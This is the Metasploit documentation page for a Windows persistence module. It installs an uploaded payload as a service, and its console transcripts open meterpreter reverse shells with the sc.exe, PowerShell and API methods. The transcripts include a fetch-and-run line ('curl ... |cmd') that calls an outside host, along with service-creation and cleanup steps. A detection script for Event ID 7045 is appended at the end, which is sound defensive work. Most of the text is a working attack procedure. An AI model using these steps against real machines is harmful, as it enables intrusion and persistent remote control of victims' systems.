GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/persistence/service.md

Description

This module generates an executable, uploads it to the remote host and registers it as a persistent service: a new service is created whose binary is the payload, so the payload runs whenever the service starts. Administrator or SYSTEM privileges are required.

Options

PAYLOAD_NAME

Name of the payload file to write. Defaults to a random string.

SERVICE_NAME

The name of the service. Defaults to a random string.

SERVICE_DESCRIPTION

The description of the service. Defaults to a random string.

SERVICE_DISPLAY_NAME

The display name of the service. Defaults to a random string.

METHOD

Which method to use to create and start the service. Options are Auto (try each method in turn until one succeeds), API, Powershell and sc.exe.

Verification Steps

  1. get a session on the target with admin/system privileges

  2. use exploit/windows/persistence/service

  3. set payload <payload>

  4. set lport <lport>

  5. set lhost <lhost>

  6. exploit

Scenarios

Windows 10 1909 (10.0 Build 18363)

Initial shell

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Starting persistent handler(s)...
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49801) at 2025-11-05 16:15:06 -0500

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > background
[*] Backgrounding session 1...

Method: sc.exe

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/service
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/service) > set session 1
session => 1
msf exploit(windows/persistence/service) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/service) > set method sc.exe
method => sc.exe
msf exploit(windows/persistence/service) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(windows/persistence/service) >
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\nAhKD.exe
[*] Attempting sc.exe method
[*] Install service: amOovON (YmGjSOMpyNU)
[*] Service install response: [SC] CreateService SUCCESS
[*] [SC] ChangeServiceConfig2 SUCCESS
[*] Starting service
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Service start response:
SERVICE_NAME: YmGjSOMpyNU
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 6664
        FLAGS              :
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49831) at 2025-11-05 16:30:40 -0500

msf exploit(windows/persistence/service) > jobs -K
Stopping all jobs...

Method: Powershell

msf exploit(windows/persistence/service) > set method Powershell
method => Powershell
msf exploit(windows/persistence/service) > exploit
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(windows/persistence/service) >
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\ShNuFKol.exe
[*] Attempting Powershell method
[*] Install service: eIOICL (mpSlHnVCx)
[*] Service install response:
Status   Name               DisplayName
------   ----               -----------
Stopped  mpSlHnVCx          eIOICL
[*] Starting service
[*] Service start response:
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 2.2.2.2:49833) at 2025-11-05 16:31:22 -0500

msf exploit(windows/persistence/service) > jobs -K
Stopping all jobs...

Method: API

msf exploit(windows/persistence/service) > set method API
method => API
msf exploit(windows/persistence/service) > exploit
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/service) >
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\ETuJrSPU.exe
[*] Attempting API method
[*] Install service: vElWSh (krKyTZyQvSWg)
[*] Service install code: 0
[*] Starting service
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Service start code: 0
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc
[*] Meterpreter session 4 opened (1.1.1.1:4444 -> 2.2.2.2:49834) at 2025-11-05 16:31:41 -0500

Method: Auto

msf exploit(windows/persistence/service) > set method Auto
method => Auto
msf exploit(windows/persistence/service) > exploit
[*] Exploit running as background job 4.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/service) >
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\xuGMR.exe
[*] Attempting API method
[*] Install service: cbuEWFVI (NzbjSkwfZrk)
[*] Service install code: 0
[*] Starting service
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Service start code: 0
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc
[*] Meterpreter session 5 opened (1.1.1.1:4444 -> 2.2.2.2:49835) at 2025-11-05 16:32:06 -0500

Cleanup

msf exploit(windows/persistence/service) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc)> rm "C:\\Users\\windows\\AppData\\Local\\Temp\\nAhKD.exe"
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc)> execute -H -f sc.exe -a "stop YmGjSOMpyNU"
Process 2812 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc)> execute -H -f sc.exe -a "delete YmGjSOMpyNU"
Process 4140 created.

meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc)> rm "C:\\Users\\windows\\AppData\\Local\\Temp\\ShNuFKol.exe"
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc)> execute -H -f sc.exe -a "stop mpSlHnVCx"
Process 680 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc)> execute -H -f sc.exe -a "delete mpSlHnVCx"
Process 8940 created.

meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc)> rm "C:\\Users\\windows\\AppData\\Local\\Temp\\ETuJrSPU.exe"
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc)> execute -H -f sc.exe -a "stop krKyTZyQvSWg"
Process 3660 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc)> execute -H -f sc.exe -a "delete krKyTZyQvSWg"
Process 1728 created.

meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc)> rm "C:\\Users\\windows\\AppData\\Local\\Temp\\xuGMR.exe"
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc)> execute -H -f sc.exe -a "stop NzbjSkwfZrk"
Process 3448 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc)> execute -H -f sc.exe -a "delete NzbjSkwfZrk"
Process 9020 created.

meterpreter > exit
[*] Shutting down session: 1
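Every scenario above, whichever METHOD it used, registered a service whose binary lives under the user's AppData\Local\Temp, and the System log keeps the Event ID 7045 ("A service was installed in the system") record even after the cleanup RC file stops and deletes the service. The following detection script is an added example, not part of the module or its documentation; it assumes the 7045 records have been exported as one JSON object per line using the event's EventData field names, and the sample records are constructed.

```python
import json
import re
# Directories a standard user can write to. A service binary living in one of
# them is the drop-then-register pattern the scenarios above leave behind.
USER_WRITABLE_DIRS = re.compile(
    r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|\\Users\\Public\\|%TE?MP%", re.IGNORECASE)

# Constructed export of System-log Event ID 7045 ("A service was installed in
# the system") records, one JSON object per line. Field names follow the
# event's EventData; the values are made up for this example.
SAMPLE_EVENTS = r"""
{"EventID": 7045, "ServiceName": "YmGjSOMpyNU", "ImagePath": "C:\\Users\\windows\\AppData\\Local\\Temp\\nAhKD.exe", "StartType": "auto start", "AccountName": "LocalSystem"}
{"EventID": 7045, "ServiceName": "ExampleUpdater", "ImagePath": "\"C:\\Program Files\\Example\\updater.exe\" --service", "StartType": "auto start", "AccountName": "LocalSystem"}
{"EventID": 7036, "ServiceName": "Spooler", "ImagePath": "", "StartType": "", "AccountName": ""}
this line is not JSON and must be skipped rather than abort the scan
{"EventID": 7045, "ServiceName": "mpSlHnVCx", "ImagePath": "C:\\Users\\windows\\AppData\\Local\\Temp\\ShNuFKol.exe", "StartType": "demand start", "AccountName": "LocalSystem"}
"""

def parse_events(text):
    """Yield one dict per non-empty line; lines that are not JSON are skipped."""
    for line in filter(None, map(str.strip, text.splitlines())):
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue

def image_binary(image_path):
    """Return just the executable from an ImagePath, dropping quotes and arguments."""
    path = image_path.strip()
    if path.startswith('"'):
        end = path.find('"', 1)
        return path[1:end] if end > 0 else path[1:]
    return path.split(" ", 1)[0]

def suspicious_service_installs(text):
    """Return [{service, binary, severity}] for 7045 events worth triage."""
    findings = []
    for ev in parse_events(text):
        if ev.get("EventID") != 7045:
            continue  # state changes (7036) and other events are not installs
        binary = image_binary(ev.get("ImagePath", ""))
        if not USER_WRITABLE_DIRS.search(binary):
            continue
        # Auto-start as LocalSystem survives reboots with full privileges, so rank it higher.
        auto_system = (ev.get("AccountName") == "LocalSystem"
                       and (ev.get("StartType") or "").lower() == "auto start")
        findings.append({"service": ev.get("ServiceName", "?"), "binary": binary,
                         "severity": "high" if auto_system else "medium"})
    return findings
```

Because the RC file only removes the binary and the service, the 7045 record and the Temp-path ImagePath it captured remain available for retrospective triage on the host or in a SIEM that ingests the System log.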